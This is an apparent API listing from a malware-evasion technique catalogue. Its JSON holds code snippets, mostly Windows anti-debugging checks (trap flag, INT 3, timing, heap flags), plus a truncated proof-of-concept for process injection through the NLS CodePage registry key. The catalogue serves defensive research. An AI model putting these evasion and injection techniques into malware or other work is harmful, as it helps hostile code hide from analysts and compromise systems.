GET /api/snippets/?format=api&page=3
HTTP 200 OK
Allow: GET, POST, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "count": 206,
    "next": "https://unprotect.it/api/snippets/?format=api&page=4",
    "previous": "https://unprotect.it/api/snippets/?format=api&page=2",
    "results": [
        {
            "id": 110,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 19,
                "username": "External",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": null,
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/59/?format=api",
            "description": "",
            "plain_code": "#include <stdio.h>\r\n#include <windows.h>\r\ntypedef HANDLE (*_CsrGetProcessId)();\r\n\r\nint main(void)\r\n{\r\n    HMODULE nt=GetModuleHandle(\"ntdll.dll\");\r\n    _CsrGetProcessId CsrGetProcessId=(_CsrGetProcessId)GetProcAddress(nt,\"CsrGetProcessId\");\r\n    HANDLE proc = OpenProcess(PROCESS_ALL_ACCESS,FALSE,CsrGetProcessId());\r\n\r\n    if(!proc)\r\n    {\r\n        printf(\"debugger is present!\");\r\n    }\r\n}"
        },
        {
            "id": 109,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 19,
                "username": "External",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": null,
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/60/?format=api",
            "description": "Original source code is available here: https://anti-debug.checkpoint.com/techniques/object-handles.html#closehandle",
            "plain_code": "bool Check()\r\n{\r\n    __try\r\n    {\r\n        CloseHandle((HANDLE)0xDEADBEEF);\r\n        return false;\r\n    }\r\n    __except (EXCEPTION_INVALID_HANDLE == GetExceptionCode()\r\n                ? EXCEPTION_EXECUTE_HANDLER \r\n                : EXCEPTION_CONTINUE_SEARCH)\r\n    {\r\n        return true;\r\n    }\r\n}"
        },
        {
            "id": 108,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 19,
                "username": "External",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": null,
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/62/?format=api",
            "description": "Original source code available here: https://anti-debug.checkpoint.com/techniques/debug-flags.html#manual-checks-heap-flags",
            "plain_code": "bool Check()\r\n{\r\n#ifndef _WIN64\r\n    PPEB pPeb = (PPEB)__readfsdword(0x30);\r\n    PVOID pHeapBase = !m_bIsWow64\r\n        ? (PVOID)(*(PDWORD_PTR)((PBYTE)pPeb + 0x18))\r\n        : (PVOID)(*(PDWORD_PTR)((PBYTE)pPeb + 0x1030));\r\n    DWORD dwHeapFlagsOffset = IsWindowsVistaOrGreater()\r\n        ? 0x40\r\n        : 0x0C;\r\n    DWORD dwHeapForceFlagsOffset = IsWindowsVistaOrGreater()\r\n        ? 0x44 \r\n        : 0x10;\r\n#else\r\n    PPEB pPeb = (PPEB)__readgsqword(0x60);\r\n    PVOID pHeapBase = (PVOID)(*(PDWORD_PTR)((PBYTE)pPeb + 0x30));\r\n    DWORD dwHeapFlagsOffset = IsWindowsVistaOrGreater()\r\n        ? 0x70 \r\n        : 0x14;\r\n    DWORD dwHeapForceFlagsOffset = IsWindowsVistaOrGreater()\r\n        ? 0x74 \r\n        : 0x18;\r\n#endif // _WIN64\r\n\r\n    PDWORD pdwHeapFlags = (PDWORD)((PBYTE)pHeapBase + dwHeapFlagsOffset);\r\n    PDWORD pdwHeapForceFlags = (PDWORD)((PBYTE)pHeapBase + dwHeapForceFlagsOffset);\r\n    return (*pdwHeapFlags & ~HEAP_GROWABLE) || (*pdwHeapForceFlags != 0);\r\n}"
        },
        {
            "id": 107,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 19,
                "username": "External",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": null,
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/65/?format=api",
            "description": "Original code available here: https://anti-debug.checkpoint.com/techniques/timing.html#kernel-timing",
            "plain_code": "bool IsDebugged(DWORD dwNativeElapsed)\r\n{\r\n    DWORD dwStart = GetTickCount();\r\n    // ... some work\r\n    return (GetTickCount() - dwStart) > dwNativeElapsed;\r\n}"
        },
        {
            "id": 106,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 19,
                "username": "External",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": null,
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/66/?format=api",
            "description": "Original source code available here: https://anti-debug.checkpoint.com/techniques/timing.html#getsystemtime",
            "plain_code": "bool IsDebugged(DWORD64 qwNativeElapsed)\r\n{\r\n    SYSTEMTIME stStart, stEnd;\r\n    FILETIME ftStart, ftEnd;\r\n    ULARGE_INTEGER uiStart, uiEnd;\r\n\r\n    GetLocalTime(&stStart);\r\n    // ... some work\r\n    GetLocalTime(&stEnd);\r\n\r\n    if (!SystemTimeToFileTime(&stStart, &ftStart))\r\n        return false;\r\n    if (!SystemTimeToFileTime(&stEnd, &ftEnd))\r\n        return false;\r\n\r\n    uiStart.LowPart  = ftStart.dwLowDateTime;\r\n    uiStart.HighPart = ftStart.dwHighDateTime;\r\n    uiEnd.LowPart  = ftEnd.dwLowDateTime;\r\n    uiEnd.HighPart = ftEnd.dwHighDateTime;\r\n    return (uiEnd.QuadPart - uiStart.QuadPart) > qwNativeElapsed;\r\n}"
        },
        {
            "id": 105,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 19,
                "username": "External",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": null,
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/72/?format=api",
            "description": "The example below shows how to calculate the checksum of a function so that a breakpoint set with INT3 inside it can be detected. Original source code available here:",
            "plain_code": "DWORD CalcFuncCrc(PUCHAR funcBegin, PUCHAR funcEnd)\r\n{\r\n    DWORD crc = 0;\r\n    for (; funcBegin < funcEnd; ++funcBegin)\r\n    {\r\n        crc += *funcBegin;\r\n    }\r\n    return crc;\r\n}\r\n#pragma auto_inline(off)\r\nVOID DebuggeeFunction()\r\n{\r\n    int calc = 0;\r\n    calc += 2;\r\n    calc <<= 8;\r\n    calc -= 3;\r\n}\r\nVOID DebuggeeFunctionEnd()\r\n{\r\n};\r\n#pragma auto_inline(on)\r\nDWORD g_origCrc = 0x2bd0;\r\nint main()\r\n{\r\n    DWORD crc = CalcFuncCrc((PUCHAR)DebuggeeFunction, (PUCHAR)DebuggeeFunctionEnd);\r\n    if (g_origCrc != crc)\r\n    {\r\n        std::cout << \"Stop debugging program!\" << std::endl;\r\n        exit(-1);\r\n    }\r\n    return 0;\r\n} It was originally published on https://www.apriorit.com/"
        },
        {
            "id": 104,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 19,
                "username": "External",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": null,
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/71/?format=api",
            "description": "Original source code available here: https://github.com/LordNoteworthy/al-khaser/blob/master/al-khaser/AntiDebug/UnhandledExceptionFilter_Handler.cpp",
            "plain_code": "#include \"pch.h\"\r\n#include \"UnhandledExceptionFilter_Handler.h\"\r\n\r\n\r\n/*\r\nWhen an exception occurs, and no registered Exception Handlers exist (neither Structured nor\r\nVectored), or if none of the registered handlers handles the exception, then the kernel32\r\nUnhandledExceptionFilter() function will be called as a last resort. \r\n*/\r\n\r\nBOOL bIsBeinDbg = TRUE;\r\n\r\nLONG WINAPI UnhandledExcepFilter(PEXCEPTION_POINTERS pExcepPointers)\r\n{\r\n\t// If a debugger is present, then this function will not be reached.\r\n\tbIsBeinDbg = FALSE;\r\n    return EXCEPTION_CONTINUE_EXECUTION;\r\n}\r\n\r\n\r\nBOOL UnhandledExcepFilterTest ()\r\n{\r\n\tLPTOP_LEVEL_EXCEPTION_FILTER Top = SetUnhandledExceptionFilter(UnhandledExcepFilter);\r\n\tRaiseException(EXCEPTION_FLT_DIVIDE_BY_ZERO, 0, 0, NULL);\r\n\tSetUnhandledExceptionFilter(Top);\r\n\treturn bIsBeinDbg;\r\n}"
        },
        {
            "id": 103,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 19,
                "username": "External",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": null,
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/214/?format=api",
            "description": "Original source code available here: https://github.com/LordNoteworthy/al-khaser/blob/master/al-khaser/AntiDebug/TrapFlag.cpp",
            "plain_code": "#include \"pch.h\"\r\n\r\n#include \"TrapFlag.h\"\r\n\r\n/*\r\n\tThis technique is similar to exceptions based debugger detections.\r\n\tYou enable the trap flag in the current process and check whether\r\n\tan exception is raised or not. If an exception is not raised, you\r\n\tcan assume that a debugger has “swallowed” the exception for us,\r\n\tand that the program is being traced. The beauty of this approach\r\n\tis that it detects every debugger, user mode or kernel mode,\r\n\tbecause they all use the trap flag for tracing a program.\r\n\tVectored Exception Handling is used here because SEH is an\r\n\tanti-debug trick in itself.\r\n*/\r\n\r\nstatic BOOL SwallowedException = TRUE;\r\n\r\nstatic LONG CALLBACK VectoredHandler(\r\n\t_In_ PEXCEPTION_POINTERS ExceptionInfo\r\n)\r\n{\r\n\tSwallowedException = FALSE;\r\n\t\r\n\tif (ExceptionInfo->ExceptionRecord->ExceptionCode == EXCEPTION_SINGLE_STEP)\r\n\t\treturn EXCEPTION_CONTINUE_EXECUTION;\r\n\t\t\r\n\treturn EXCEPTION_CONTINUE_SEARCH;\r\n}\r\n\r\n\r\n\r\nBOOL TrapFlag()\r\n{\r\n\tPVOID Handle = AddVectoredExceptionHandler(1, VectoredHandler);\r\n\tSwallowedException = TRUE;\r\n\r\n#ifdef _WIN64\r\n\tUINT64 eflags = __readeflags();\r\n#else\r\n\tUINT eflags = __readeflags();\r\n#endif\r\n\r\n\t//  Set the trap flag\r\n\teflags |= 0x100;\r\n\t__writeeflags(eflags);\r\n\r\n\tRemoveVectoredExceptionHandler(Handle);\r\n\treturn SwallowedException;\r\n}"
        },
        {
            "id": 102,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 19,
                "username": "External",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": null,
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/212/?format=api",
            "description": "Original source code available here: https://github.com/LordNoteworthy/al-khaser/blob/master/al-khaser/AntiDebug/Interrupt_0x2d.cpp",
            "plain_code": "#include \"pch.h\"\r\n\r\n#include \"Interrupt_0x2d.h\"\r\n\r\n/*\r\nThe Interrupt_0x2d function will check to see if a debugger is attached to the current process. It does this by setting up\r\nSEH and using the Int 2D instruction which will only cause an exception if there is no debugger. Also when used in OllyDBG\r\nit will skip a byte in the disassembly which could be used to detect the debugger.\r\nVectored Exception Handling is used here because SEH is an anti-debug trick in itself.\r\n*/\r\n\r\nextern \"C\" void __int2d();\r\n\r\nstatic BOOL SwallowedException = TRUE;\r\n\r\nstatic LONG CALLBACK VectoredHandler(\r\n\t_In_ PEXCEPTION_POINTERS ExceptionInfo\r\n)\r\n{\r\n\tSwallowedException = FALSE;\r\n\tif (ExceptionInfo->ExceptionRecord->ExceptionCode == EXCEPTION_BREAKPOINT)\r\n\t{\r\n\t\t//The Int 2D instruction already increased EIP/RIP so we don't do that (although it wouldnt hurt).\r\n\t\treturn EXCEPTION_CONTINUE_EXECUTION;\r\n\t}\r\n\treturn EXCEPTION_CONTINUE_SEARCH;\r\n}\r\n\r\nBOOL Interrupt_0x2d()\r\n{\r\n\tPVOID Handle = AddVectoredExceptionHandler(1, VectoredHandler);\r\n\tSwallowedException = TRUE;\r\n\t__int2d();\r\n\tRemoveVectoredExceptionHandler(Handle);\r\n\treturn SwallowedException;\r\n}"
        },
        {
            "id": 101,
            "language": {
                "id": 5,
                "label": "Assembly",
                "code_class": "x86asm"
            },
            "user": {
                "id": 19,
                "username": "External",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": null,
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/214/?format=api",
            "description": "",
            "plain_code": "BOOL IsDebuggerPresent_TrapFlag()\r\n{\r\n    __try\r\n    { \r\n        __asm\r\n       {\r\n           pushfd\r\n           or word ptr[esp], 0x100\r\n           popfd\r\n           nop\r\n       }\r\n    }\r\n    __except(1) \r\n    { \r\n        return FALSE; \r\n    }\r\n    return TRUE;\r\n}"
        },
        {
            "id": 100,
            "language": {
                "id": 5,
                "label": "Assembly",
                "code_class": "x86asm"
            },
            "user": {
                "id": 19,
                "username": "External",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": null,
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/213/?format=api",
            "description": "",
            "plain_code": "BOOL IsDebuggerPresent_IceBp()\r\n{\r\n    __try\r\n    { \r\n        __asm __emit 0xF1 \r\n    }\r\n    __except(1) \r\n    { \r\n        return FALSE; \r\n    }\r\n    return TRUE;\r\n}"
        },
        {
            "id": 99,
            "language": {
                "id": 5,
                "label": "Assembly",
                "code_class": "x86asm"
            },
            "user": {
                "id": 19,
                "username": "External",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": null,
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/212/?format=api",
            "description": "",
            "plain_code": "BOOL IsDebuggerPresent_Int2d()\r\n{\r\n    __try\r\n    { \r\n        __asm int 0x2d \r\n    }\r\n    __except(1)\r\n    {\r\n        return FALSE;\r\n    }\r\n    return TRUE;\r\n}"
        },
        {
            "id": 98,
            "language": {
                "id": 5,
                "label": "Assembly",
                "code_class": "x86asm"
            },
            "user": {
                "id": 19,
                "username": "External",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": null,
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/74/?format=api",
            "description": "",
            "plain_code": "BOOL IsDebuggerPresent_Int3()\r\n{\r\n      __try\r\n         { \r\n             __asm int 3 \r\n         }\r\n      __except(1) \r\n         { \r\n             return FALSE; \r\n         }\r\n     return TRUE;\r\n\r\n}"
        },
        {
            "id": 97,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 19,
                "username": "External",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": null,
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/74/?format=api",
            "description": "Original code available here: https://github.com/LordNoteworthy/al-khaser/blob/master/al-khaser/AntiDebug/SoftwareBreakpoints.cpp",
            "plain_code": "#include \"pch.h\"\r\n\r\n#include \"SoftwareBreakpoints.h\"\r\n\r\n\r\n/*\r\nSoftware breakpoints aka INT 3 represented in the IA-32 instruction set with the opcode CC (0xCC).\r\nGiven a memory addresse and size, it is relatively simple to scan for the byte 0xCC -> if(pTmp[i] == 0xCC)\r\nAn obfuscated method would be to check if our memory byte xored with 0x55 is equal 0x99 for example ... \r\n*/\r\n\r\nVOID My_Critical_Function()\r\n{\r\n\tint a = 1;\r\n\tint b = 2;\r\n\tint c = a + b;\r\n\t_tprintf(_T(\"I am critical function, you should protect against int3 bps %d\"), c);\r\n}\r\n\r\n\r\nVOID Myfunction_Adresss_Next()\r\n{\r\n\tMy_Critical_Function();\r\n\t/*\r\n\tThere is no guaranteed way of determining the size of a function at run time(and little reason to do so)\r\n\thowever if you assume that the linker located functions that are adjacent in the source code sequentially in memory,\r\n\tthen the following may give an indication of the size of a function Critical_Function by using :\r\n\tint Critical_Function_length = (int)Myfunction_Adresss_Next - (int)Critical_Function\r\n\tWorks only if you compile the file in Release mode.\r\n\t*/\r\n};\r\n\r\nBOOL SoftwareBreakpoints()\r\n{\r\n\t//NOTE this check might not work on x64 because of alignment 0xCC bytes\r\n\tsize_t sSizeToCheck = (size_t)(Myfunction_Adresss_Next)-(size_t)(My_Critical_Function);\r\n\tPUCHAR Critical_Function = (PUCHAR)My_Critical_Function;\r\n\r\n\tfor (size_t i = 0; i < sSizeToCheck; i++) {\r\n\t\tif (Critical_Function[i] == 0xCC) // Adding another level of indirection : 0xCC xor 0x55 = 0x99\r\n\t\t\treturn TRUE;\r\n\t}\r\n\treturn FALSE;\r\n}"
        },
        {
            "id": 96,
            "language": {
                "id": 6,
                "label": "MASM",
                "code_class": "x86asm"
            },
            "user": {
                "id": 19,
                "username": "External",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": null,
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/70/?format=api",
            "description": "This snippet was originally published here: http://www.openrce.org/reference_library/anti_reversing_view/8/OllyDbg%20Filename%20Format%20String/",
            "plain_code": ".386\r\n      .model flat, stdcall\r\n      option casemap :none   ; case sensitive\r\n\r\n      include \\masm32\\include\\windows.inc\r\n      include \\masm32\\include\\user32.inc\r\n      include \\masm32\\include\\kernel32.inc\r\n\r\n      includelib \\masm32\\lib\\user32.lib\r\n      includelib \\masm32\\lib\\kernel32.lib\r\n\r\n    .data\r\n       DbgNotFoundTitle db \"Debugger status:\",0h\r\n       DbgFoundTitle db \"Debugger status:\",0h\r\n       DbgNotFoundText db \"Debugger not found!\",0h\r\n       DbgFoundText db \"Debugger found!\",0h\r\n       OriginalFileName db \"%s%s.exe\",0h\r\n    .data?\r\n       filename db 512 dup(?)\r\n    .code\r\n\r\nstart:\r\n\r\n; MASM32 BadStringFormat example\r\n; coded by ap0x\r\n; Reversing Labs: http://ap0x.headcoders.net\r\n\r\n; This example takes advantage of OllyDBG not handleing strings properly.\r\n; Code is based on Piotr Bania`s description.\r\n; How does it work? If we name the file %s%s or any other name that has\r\n; %s%s in it`s name OllyDBG will crash.\r\n; How to use this?\r\n; We just check if the file has been renamed.\r\n\r\nPUSH 512\r\nPUSH offset filename ;%s%s.exe\r\nPUSH 0\r\nCALL GetModuleFileName\r\n\r\nMOV ECX,offset filename\r\nADD ECX,EAX\r\n\r\n  @SeekFileName:\r\nDEC ECX\r\nCMP BYTE PTR[ECX],'\\'\r\nJNE @SeekFileName\r\n\r\nMOV BYTE PTR[ECX],0\r\nINC ECX\r\n\r\nPUSH ECX\r\nPUSH offset OriginalFileName ;%s%s.exe\r\nCALL lstrcmp\r\n\r\nTEST EAX,EAX\r\nJNE @DebuggerDetected\r\n\r\nPUSH 40h\r\nPUSH offset DbgNotFoundTitle\r\nPUSH offset DbgNotFoundText\r\nPUSH 0\r\nCALL MessageBox\r\n\r\nJMP @exit\r\n  @DebuggerDetected:\r\n\r\nPUSH 30h\r\nPUSH offset DbgFoundTitle\r\nPUSH offset DbgFoundText\r\nPUSH 0\r\nCALL MessageBox\r\n\r\n  @exit:\r\n\r\nPUSH 0\r\nCALL ExitProcess\r\n\r\nend start"
        },
        {
            "id": 95,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 19,
                "username": "External",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": null,
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/109/?format=api",
            "description": "https://anti-debug.checkpoint.com/techniques/interactive.html#suspendthread",
            "plain_code": "DWORD g_dwDebuggerProcessId = -1;\r\n\r\nBOOL CALLBACK EnumWindowsProc(HWND hwnd, LPARAM lParam)\r\n{\r\n    DWORD dwProcessId = *(PDWORD)lParam;\r\n\r\n    DWORD dwWindowProcessId;\r\n    GetWindowThreadProcessId(hwnd, &dwWindowProcessId);\r\n\r\n    if (dwProcessId == dwWindowProcessId)\r\n    {\r\n        std::wstring wsWindowTitle{ string_heper::ToLower(std::wstring(GetWindowTextLengthW(hwnd) + 1, L'\\0')) };\r\n        GetWindowTextW(hwnd, &wsWindowTitle[0], wsWindowTitle.size());\r\n\r\n        if (string_heper::FindSubstringW(wsWindowTitle, L\"dbg\") || \r\n            string_heper::FindSubstringW(wsWindowTitle, L\"debugger\"))\r\n        {\r\n            g_dwDebuggerProcessId = dwProcessId;\r\n            return FALSE;\r\n        }\r\n        return FALSE;\r\n    }\r\n\r\n    return TRUE;\r\n}\r\n\r\nbool IsDebuggerProcess(DWORD dwProcessId) const\r\n{\r\n    EnumWindows(EnumWindowsProc, reinterpret_cast<LPARAM>(&dwProcessId));\r\n    return g_dwDebuggerProcessId == dwProcessId;\r\n}\r\n\r\nbool SuspendDebuggerThread()\r\n{\r\n    THREADENTRY32 ThreadEntry = { 0 };\r\n    ThreadEntry.dwSize = sizeof(THREADENTRY32);\r\n\r\n    DWORD dwParentProcessId = process_helper::GetParentProcessId(GetCurrentProcessId());\r\n    if (-1 == dwParentProcessId)\r\n        return false;\r\n\r\n    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, dwParentProcessId);\r\n    if(Thread32First(hSnapshot, &ThreadEntry))\r\n    {\r\n        do\r\n        {\r\n            if ((ThreadEntry.th32OwnerProcessID == dwParentProcessId) && IsDebuggerProcess(dwParentProcessId))\r\n            {\r\n                HANDLE hThread = OpenThread(THREAD_SUSPEND_RESUME, FALSE, ThreadEntry.th32ThreadID);\r\n                if (hThread)\r\n                    SuspendThread(hThread);\r\n                break;\r\n            }\r\n        } while(Thread32Next(hSnapshot, &ThreadEntry));\r\n    }\r\n\r\n    if (hSnapshot)\r\n        CloseHandle(hSnapshot);\r\n\r\n  
  return false;\r\n}"
        },
        {
            "id": 94,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 6,
                "username": "Unprotect",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/hashtag/unprotectproject",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/208/?format=api",
            "description": "The proof of concept (PoC) uses position-independent shellcode, injected into a remote process, as a stager for the actual loading of the DLL.\r\n\r\nOriginal source code: https://github.com/NtQuerySystemInformation/NlsCodeInjectionThroughRegistry",
            "plain_code": "/* NLSRegistryCodeInjection.cpp */\r\n\r\n#include \"payload.hpp\"\r\n#include \"headers.hpp\"\r\n\r\n//Pending: Make initializer_list cleaner\r\nuint32_t main(void)\r\n{\r\n    std::initializer_list<std::wstring> list = { L\"SYSTEM\\\\ControlSet001\\\\Control\\\\Nls\\\\CodePage\", L\"Payload.dll\" , L\"\"};\r\n    auto regObj = std::make_unique<RegistryManipulation>(list);\r\n    if (OpenKeyForNlsModification(regObj.get()))\r\n    {\r\n#ifdef DEBUG\r\n        std::printf(\"Key has been modified, now preparing for injection\\n\");\r\n#endif \r\n        std::printf(\"Payload executed sucessfully :)\\n\");\r\n        system(\"pause\");\r\n    }\r\n\r\n    return EXIT_SUCCESS;\r\n}\r\n//###########################################################\r\n/* payload.cpp */\r\n\r\n#include \"headers.hpp\"\r\n#include \"payload.hpp\"\r\n#include \"strsafe.h\"\r\n#include \"payload.hpp\"\r\n#include \"resource1.h\"\r\n#define MAX_SIZE_DATA 260\r\n\r\n//IMPLEMENTED IT two different functions for convertion. 
\r\nUINT StringToIntDecimal(PWCHAR str) noexcept\r\n{\r\n\tuint32_t num = _wtoi(str);\r\n\treturn num;\r\n}\r\nUINT StringToInt(PWCHAR str) noexcept {\r\n\r\n\twchar_t chrSubkey, chr, * j;\r\n\tUINT i;\r\n\tj = str;\r\n\tchrSubkey = *str;\r\n\tfor (i = 0; *j; chrSubkey = *j)\r\n\t{\r\n\t\t++j;\r\n\t\tif ((chrSubkey - 0x41) > 5u)\r\n\t\t{\r\n\t\t\tif ((chrSubkey - 0x30) > 9u)\r\n\t\t\t{\r\n\t\t\t\tif ((chrSubkey - 0x61) > 5u)\r\n\t\t\t\t\treturn i;\r\n\t\t\t\tchr = chrSubkey - 87;\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\tchr = chrSubkey - 0x30;\r\n\t\t\t}\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tchr = chrSubkey - 55;\r\n\t\t}\r\n\t\ti = chr + 16 * i;\r\n\t}\r\n\treturn i;\r\n}\r\nBOOLEAN CompareLastElementString(PWCHAR str1, PWCHAR str2, BOOLEAN CaseInsensitive)\r\n{\r\n\tbool bResult = false;\r\n\t//Has to find .dll somewhere, in the substring, otherwise doesnt exist.\r\n\twchar_t* dll = wcsstr(str1, str2);\r\n\tif (dll != nullptr) {\r\n\t\tbResult = true;\r\n\t}\r\n\treturn bResult;\r\n}\r\nbool FindCodePageWithPayload(PRegistryKey regObject, UINT dwValuesCount, UINT dwMaxLenValues){\r\n\tDWORD dwCountName = 0, typeData, ValueDataSize = 0;\r\n\t//uint32_t CodePageInt;\r\n\tWCHAR CodePageID[MAX_PATH], ValueData[MAX_SIZE_DATA];\r\n\tbool bResult = false;\r\n\r\n\tfor (UINT i = 0; i < dwValuesCount; i++) {\r\n\t\tdwCountName = 260;  \r\n\t\tValueDataSize = 260;\r\n\t\tLSTATUS status = RegEnumValueW(regObject->hSubkeyNls, i, CodePageID, &dwCountName, nullptr, &typeData, (BYTE*)&ValueData,\r\n\t\t\t&ValueDataSize);\r\n\t\tif (status != ERROR_SUCCESS && GetLastError() != ERROR_ALREADY_EXISTS)\r\n\t\t{\r\n\t\t\tstd::wprintf(L\"Could not query Code Page ID %s, Last error: [%x]\\n\", CodePageID, GetLastError());\r\n\t\t\tcontinue;\r\n\t\t}\r\n#ifdef _DEBUG\r\n\t\tstd::wprintf(L\"Iterating: %d - %s = %s\\n\", i, CodePageID, ValueData);\r\n#endif \r\n\t\tif (typeData == REG_SZ && regObject->compareStringEqual(Index::DLL_NAME, ValueData)){\r\n#ifdef 
_DEBUG\r\n\t\t\tstd::wprintf(L\"Payload value has been found!: %d - %s = %s\\n\", i, CodePageID, ValueData);\r\n#endif\r\n\t\t\tuint32_t strHex = std::stoull(CodePageID, nullptr, 10);\r\n\t\t\tuint32_t strDecimal = std::stoull(CodePageID, nullptr, 16);\r\n\t\t\tregObject->setCodePageID(strHex, CodePageIDIndex::CodePageInt);\r\n\t\t\tregObject->setCodePageID(strDecimal, CodePageIDIndex::CodePageHex);\r\n\t\t\tstd::wprintf(L\"Values: CodepageHex = %d, CodePageInt = 0x%x\\n\", strDecimal, strHex);\r\n\t\t\tbResult = true;\r\n\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\treturn bResult;\r\n}\r\n\r\nbool IterateCodePageAndExtractProperId(PRegistryKey regObject) {\r\n\tDWORD dwMaxLenValues, dwCountName = 0, dwValuesCount, typeData, ValueDataSize = 0;\r\n\tuint32_t CodePageInt = NULL, posCount = NULL;\r\n\tbool correctRet = false;\r\n\tLSTATUS status;\r\n\tWCHAR CodePageID[MAX_PATH], ValueData[MAX_SIZE_DATA];\r\n\r\n\t//Queries information for the NLS subkey, mostly related to the values, which is the part that interests us the most.\r\n\tif (::RegQueryInfoKeyW(regObject->hSubkeyNls, nullptr, nullptr, nullptr,\r\n\t\tnullptr, nullptr, nullptr, &dwValuesCount, &dwMaxLenValues, nullptr, nullptr, nullptr))\r\n\t{\r\n\t\tstd::cerr << \"Could not query information for the key, last error is: \" << GetLastError() << \"\\n\";\r\n\t\treturn correctRet;\r\n\t}\r\n\t//Only one failing, lets fix it.\r\n\tif (FindCodePageWithPayload(regObject, dwValuesCount, dwMaxLenValues)){\r\n\t\tcorrectRet = true;\r\n\t\treturn correctRet;\r\n\t}\r\n\t//Find one with .dll, then from there increase one until it works out.\r\n\tfor (UINT i = 0; i < dwValuesCount; i++) {\r\n\t\tdwCountName = 260;\r\n\t\tValueDataSize = 260;\r\n\t\tstatus = RegEnumValueW(regObject->hSubkeyNls, i, CodePageID, &dwCountName, nullptr, &typeData, (BYTE*)&ValueData,\r\n\t\t\t&ValueDataSize);\r\n\t\tif ((status != EXIT_SUCCESS) && (GetLastError() != ERROR_ALREADY_EXISTS))\r\n\t\t{\r\n\t\t\tstd::wprintf(L\"Could not query Code Page ID 
%s, Last error: [%x]\\n\", CodePageID, status);\r\n\t\t\tcontinue;\r\n\t\t}\r\n#ifdef _DEBUG\r\n\t\tstd::wprintf(L\"Querying value i: %d, %s = %s\\n\", i, CodePageID, ValueData);\r\n#endif\r\n\t\tif (typeData == REG_SZ && CompareLastElementString(ValueData, const_cast<wchar_t*>(L\".dll\"), FALSE))\r\n\t\t{\r\n#ifdef _DEBUG\r\n\t\t\tstd::wprintf(L\"Value with dll found in i = %d, %s = %s\\n\", i, CodePageID, ValueData);\r\n\t\t\t//Convert from str to hex\r\n\t\t\tCodePageInt = StringToInt(CodePageID);\r\n\t\t\tstd::wprintf(L\"Code page as int is: %x\\n\", CodePageInt);\r\n#endif // _DEBUG\r\n\t\t\tCodePageInt = StringToInt(CodePageID);\r\n\t\t\tposCount = i;\r\n\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\tif (CodePageInt == NULL) {\r\n\t\tstd::printf(\"Could not find apropiate dll extension inside one of the subvalues\\n\");\r\n\t\treturn correctRet;\r\n\t}\r\n\t//FIX THIS CODE, WHEN PRINTING THERE IS SOMETHING THAT GOES WRONG.\r\n\tCodePageInt += 1;\r\n\tfor (UINT i = 0; i < dwValuesCount - posCount; i++) {\r\n\t\t//2.Then we proceed to check if the code page ID value exists, if it doesnt, we create it and set the data.\r\n\t\tif (SUCCEEDED(StringCchPrintfW(ValueData, MAX_SIZE_DATA, L\"%04x\", CodePageInt)))\r\n\t\t{\r\n\t\t\tstd::printf(\"Trying to create in CodePage ID %x\\n\", CodePageInt);\r\n\t\t}\r\n\t\tstatus = RegQueryValueEx(regObject->hSubkeyNls, ValueData, NULL, NULL, NULL, NULL);\r\n\t\tif (status != ERROR_SUCCESS && status == 